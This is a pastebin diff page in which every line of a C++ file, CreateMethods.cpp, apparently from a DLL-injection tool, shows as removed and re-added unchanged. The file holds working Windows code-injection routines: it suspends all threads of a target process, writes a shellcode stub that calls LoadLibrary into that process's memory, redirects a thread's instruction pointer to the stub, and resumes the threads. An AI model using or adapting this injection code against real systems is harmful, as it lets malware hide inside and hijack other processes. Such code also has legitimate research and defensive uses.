View difference between Paste ID: <a href="/Jacsq0PE">Jacsq0PE</a> and <a href="/mApUUzan">mApUUzan</a>

/*
1	-	/*
1	+	/*
2	-	CreateMethods.cpp
2	+	CreateMethods.cpp
3	-	brad.antoniewicz@foundstone.com
3	+	brad.antoniewicz@foundstone.com
4	-
4	+
5	-	Contains the thread creation functions.
5	+	Contains the thread creation functions.
6	-
6	+
7	-	Currently implements:
7	+	Currently implements:
8	-
8	+
9	-	1. Suspend/Inject/Resume Method
9	+	1. Suspend/Inject/Resume Method
10	-	2. ntCreateThreadEx()
10	+	2. ntCreateThreadEx()
11	-	3. RtlCreateUserThread()
11	+	3. RtlCreateUserThread()
12	-	*/
12	+	*/
13	-
13	+
14	-
14	+
15	-
15	+
16	-	#include <windows.h>
16	+	#include <windows.h>
17	-	#include <stdio.h>
17	+	#include <stdio.h>
18	-	#include <tlhelp32.h>
18	+	#include <tlhelp32.h>
19	-	#include "ExecThread.h"
19	+	#include "ExecThread.h"
20	-	#include "AllocWriteDLL.h"
20	+	#include "AllocWriteDLL.h"
21	-
21	+
22	-	#ifndef _WIN64
22	+	#ifndef _WIN64
23	-	VOID suspendInjectResume(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {
23	+	VOID suspendInjectResume(HANDLE hHandle, LPVOID loadLibAddr, LPVOID dllPathAddr) {
24	-	/*
24	+	/*
25	-	This is a mixture from the following sites:
25	+	This is a mixture from the following sites:
26	-
26	+
27	-	http://syprog.blogspot.com/2012/05/createremotethread-bypass-windows.html
27	+	http://syprog.blogspot.com/2012/05/createremotethread-bypass-windows.html
28	-	http://www.kdsbest.com/?p=159
28	+	http://www.kdsbest.com/?p=159
29	-	*/
29	+	*/
30	-
30	+
31	-	HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
31	+	HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
32	-	HANDLE hSnapshot2 = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
32	+	HANDLE hSnapshot2 = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
33	-	HANDLE thread = NULL;
33	+	HANDLE thread = NULL;
34	-	THREADENTRY32 te;
34	+	THREADENTRY32 te;
35	-	THREADENTRY32 te2;
35	+	THREADENTRY32 te2;
36	-
36	+
37	-	CONTEXT ctx;
37	+	CONTEXT ctx;
38	-	DWORD firstThread = 0;
38	+	DWORD firstThread = 0;
39	-	HANDLE targetThread = NULL;
39	+	HANDLE targetThread = NULL;
40	-
40	+
41	-	LPVOID scAddr;
41	+	LPVOID scAddr;
42	-
42	+
43	-	int i;
43	+	int i;
44	-
44	+
45	-	unsigned char sc[] = {
45	+	unsigned char sc[] = {
46	-	// Push all flags
46	+	// Push all flags
47	-	0x9C,
47	+	0x9C,
48	-	// Push all register
48	+	// Push all register
49	-	0x60,
49	+	0x60,
50	-	// Push 3,4,5,6 (dllPathAddr)
50	+	// Push 3,4,5,6 (dllPathAddr)
51	-	0x68, 0xAA, 0xAA, 0xAA, 0xAA,
51	+	0x68, 0xAA, 0xAA, 0xAA, 0xAA,
52	-	// Mov eax, 8,9,10, 11 (loadLibAddr)
52	+	// Mov eax, 8,9,10, 11 (loadLibAddr)
53	-	0xB8, 0xBB, 0xBB, 0xBB, 0xBB,
53	+	0xB8, 0xBB, 0xBB, 0xBB, 0xBB,
54	-	// Call eax
54	+	// Call eax
55	-	0xFF, 0xD0,
55	+	0xFF, 0xD0,
56	-	// Pop all register
56	+	// Pop all register
57	-	0x61,
57	+	0x61,
58	-	// Pop all flags
58	+	// Pop all flags
59	-	0x9D,
59	+	0x9D,
60	-	// Ret
60	+	// Ret
61	-	0xC3
61	+	0xC3
62	-	};
62	+	};
63	-
63	+
64	-	te.dwSize = sizeof(THREADENTRY32);
64	+	te.dwSize = sizeof(THREADENTRY32);
65	-	te2.dwSize = sizeof(THREADENTRY32);
65	+	te2.dwSize = sizeof(THREADENTRY32);
66	-	ctx.ContextFlags = CONTEXT_FULL;
66	+	ctx.ContextFlags = CONTEXT_FULL;
67	-
67	+
68	-	sc[3] = ((unsigned int) dllPathAddr & 0xFF);
68	+	sc[3] = ((unsigned int) dllPathAddr & 0xFF);
69	-	sc[4] = (((unsigned int) dllPathAddr >> 8 )& 0xFF);
69	+	sc[4] = (((unsigned int) dllPathAddr >> 8 )& 0xFF);
70	-	sc[5] = (((unsigned int) dllPathAddr >> 16 )& 0xFF);
70	+	sc[5] = (((unsigned int) dllPathAddr >> 16 )& 0xFF);
71	-	sc[6] = (((unsigned int) dllPathAddr >> 24 )& 0xFF);
71	+	sc[6] = (((unsigned int) dllPathAddr >> 24 )& 0xFF);
72	-
72	+
73	-	sc[8] = ((unsigned int) loadLibAddr & 0xFF);
73	+	sc[8] = ((unsigned int) loadLibAddr & 0xFF);
74	-	sc[9] = (((unsigned int) loadLibAddr >> 8 )& 0xFF);
74	+	sc[9] = (((unsigned int) loadLibAddr >> 8 )& 0xFF);
75	-	sc[10] = (((unsigned int) loadLibAddr >> 16 )& 0xFF);
75	+	sc[10] = (((unsigned int) loadLibAddr >> 16 )& 0xFF);
76	-	sc[11] = (((unsigned int) loadLibAddr >> 24 )& 0xFF);
76	+	sc[11] = (((unsigned int) loadLibAddr >> 24 )& 0xFF);
77	-
77	+
78	-
78	+
79	-
79	+
80	-	// Suspend Threads
80	+	// Suspend Threads
81	-	if(Thread32First(hSnapshot, &te)) {
81	+	if(Thread32First(hSnapshot, &te)) {
82	-	do {
82	+	do {
83	-	if(te.th32OwnerProcessID == GetProcessId(hHandle)) {
83	+	if(te.th32OwnerProcessID == GetProcessId(hHandle)) {
84	-	if ( firstThread == 0 )
84	+	if ( firstThread == 0 )
85	-	firstThread = te.th32ThreadID;
85	+	firstThread = te.th32ThreadID;
86	-	thread = OpenThread(THREAD_ALL_ACCESS \| THREAD_GET_CONTEXT, FALSE, te.th32ThreadID);
86	+	thread = OpenThread(THREAD_ALL_ACCESS \| THREAD_GET_CONTEXT, FALSE, te.th32ThreadID);
87	-	if(thread != NULL) {
87	+	if(thread != NULL) {
88	-	printf("t[+] Suspending Thread 0x%08xn", te.th32ThreadID);
88	+	printf("t[+] Suspending Thread 0x%08xn", te.th32ThreadID);
89	-	SuspendThread(thread);
89	+	SuspendThread(thread);
90	-	CloseHandle(thread);
90	+	CloseHandle(thread);
91	-	} else {
91	+	} else {
92	-	printf("t[+] Could not open thread!n");
92	+	printf("t[+] Could not open thread!n");
93	-	}
93	+	}
94	-	}
94	+	}
95	-	} while(Thread32Next(hSnapshot, &te));
95	+	} while(Thread32Next(hSnapshot, &te));
96	-	} else {
96	+	} else {
97	-	printf("t[+] Could not Thread32First! [%d]n", GetLastError());
97	+	printf("t[+] Could not Thread32First! [%d]n", GetLastError());
98	-	CloseHandle(hSnapshot);
98	+	CloseHandle(hSnapshot);
99	-	exit(-1);
99	+	exit(-1);
100	-	}
100	+	}
101	-	CloseHandle(hSnapshot);
101	+	CloseHandle(hSnapshot);
102	-
102	+
103	-	printf("t[+] Our Launcher Code:nt");
103	+	printf("t[+] Our Launcher Code:nt");
104	-	for (i=0; i<17; i++)
104	+	for (i=0; i<17; i++)
105	-	printf("%02x ",sc[i]);
105	+	printf("%02x ",sc[i]);
106	-	printf("n");
106	+	printf("n");
107	-	// Get/Save EIP, Inject
107	+	// Get/Save EIP, Inject
108	-	printf("t[+] Targeting Thread 0x%08xn",firstThread);
108	+	printf("t[+] Targeting Thread 0x%08xn",firstThread);
109	-	targetThread = OpenThread(THREAD_ALL_ACCESS, FALSE, firstThread);
109	+	targetThread = OpenThread(THREAD_ALL_ACCESS, FALSE, firstThread);
110	-	if (GetThreadContext(targetThread, &ctx) == 0)
110	+	if (GetThreadContext(targetThread, &ctx) == 0)
111	-	printf("[!] GetThreadContext Failed!n");
111	+	printf("[!] GetThreadContext Failed!n");
112	-	printf("t[+] Current Registers: nttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);
112	+	printf("t[+] Current Registers: nttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);
113	-
113	+
114	-	printf("t[+] Saving EIP for our returnn");
114	+	printf("t[+] Saving EIP for our returnn");
115	-	ctx.Esp -= sizeof(unsigned int);
115	+	ctx.Esp -= sizeof(unsigned int);
116	-	WriteProcessMemory(hHandle, (LPVOID)ctx.Esp, (LPCVOID)&ctx.Eip, sizeof(unsigned int), NULL);
116	+	WriteProcessMemory(hHandle, (LPVOID)ctx.Esp, (LPCVOID)&ctx.Eip, sizeof(unsigned int), NULL);
117	-	printf("ttEIP[0x%08x] ESP[0x%08x] EBP[0x%08x]n", ctx.Eip, ctx.Esp, ctx.Ebp);
117	+	printf("ttEIP[0x%08x] ESP[0x%08x] EBP[0x%08x]n", ctx.Eip, ctx.Esp, ctx.Ebp);
118	-
118	+
119	-	scAddr = VirtualAllocEx(hHandle, NULL, 17, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
119	+	scAddr = VirtualAllocEx(hHandle, NULL, 17, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
120	-	printf("t[+] Allocating 17 bytes for our Launcher Code [0x%08x][%d]n", scAddr, GetLastError());
120	+	printf("t[+] Allocating 17 bytes for our Launcher Code [0x%08x][%d]n", scAddr, GetLastError());
121	-
121	+
122	-	printf ("t[+] Writing Launcher Code into targetThread [%d]n", WriteProcessMemory(hHandle, scAddr, (LPCVOID)sc, 17, NULL));
122	+	printf ("t[+] Writing Launcher Code into targetThread [%d]n", WriteProcessMemory(hHandle, scAddr, (LPCVOID)sc, 17, NULL));
123	-
123	+
124	-	printf("t[+] Setting EIP to LauncherCoden");
124	+	printf("t[+] Setting EIP to LauncherCoden");
125	-	ctx.Eip = (DWORD)scAddr;
125	+	ctx.Eip = (DWORD)scAddr;
126	-	printf("ttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);
126	+	printf("ttEIP[0x%08x] ESP[0x%08x]n", ctx.Eip, ctx.Esp);
127	-
127	+
128	-	if (SetThreadContext(targetThread, &ctx) == 0)
128	+	if (SetThreadContext(targetThread, &ctx) == 0)
129	-	printf("[!] SetThreadContext Failed!n");
129	+	printf("[!] SetThreadContext Failed!n");
130	-
130	+
131	-	// Resume Threads
131	+	// Resume Threads
132	-	hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
132	+	hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
133	-	te.dwSize = sizeof(THREADENTRY32);
133	+	te.dwSize = sizeof(THREADENTRY32);
134	-
134	+
135	-	if(Thread32First(hSnapshot2, &te2)) {
135	+	if(Thread32First(hSnapshot2, &te2)) {
136	-	do {
136	+	do {
137	-	if(te2.th32OwnerProcessID == GetProcessId(hHandle)) {
137	+	if(te2.th32OwnerProcessID == GetProcessId(hHandle)) {
138	-	thread = OpenThread(THREAD_ALL_ACCESS \| THREAD_GET_CONTEXT, FALSE, te2.th32ThreadID);
138	+	thread = OpenThread(THREAD_ALL_ACCESS \| THREAD_GET_CONTEXT, FALSE, te2.th32ThreadID);
139	-	if(thread != NULL) {
139	+	if(thread != NULL) {
140	-	printf("t[+] Resuming Thread 0x%08xn", te2.th32ThreadID);
140	+	printf("t[+] Resuming Thread 0x%08xn", te2.th32ThreadID);
141	-	ResumeThread(thread);
141	+	ResumeThread(thread);
142	-	if (te2.th32ThreadID == firstThread)
142	+	if (te2.th32ThreadID == firstThread)
143	-	WaitForSingleObject(thread, 5000);
143	+	WaitForSingleObject(thread, 5000);
144	-	CloseHandle(thread);
144	+	CloseHandle(thread);
145	-	} else {
145	+	} else {
146	-	printf("t[+] Could not open thread!n");
146	+	printf("t[+] Could not open thread!n");
147	-	}
147	+	}
148	-	}
148	+	}
149	-	} while(Thread32Next(hSnapshot2, &te2));
149	+	} while(Thread32Next(hSnapshot2, &te2));
150	-	} else {
150	+	} else {
151	-	printf("t[+] Could not Thread32First! [%d]n", GetLastError());
151	+	printf("t[+] Could not Thread32First! [%d]n", GetLastError());
152	-	CloseHandle(hSnapshot2);
152	+	CloseHandle(hSnapshot2);
153	-	exit(-1);
153	+	exit(-1);
154	-	}
154	+	}
155	-	CloseHandle(hSnapshot2);
155	+	CloseHandle(hSnapshot2);
156	-	}
156	+	}
157		#endif